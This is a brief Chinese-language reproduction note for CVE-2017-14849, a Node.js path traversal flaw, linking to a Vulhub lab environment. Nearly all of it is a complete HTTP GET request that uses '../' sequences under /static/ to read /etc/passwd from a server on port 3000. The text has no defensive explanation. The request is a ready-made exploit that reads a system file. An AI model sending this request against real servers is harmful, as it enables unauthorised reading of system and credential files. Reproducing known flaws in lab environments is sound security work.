漏洞详细
有关详细请看:https://vulhub.org/#/environments/node/CVE-2017-14849/
漏洞复现
发送以下数据包,即可读取文件
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close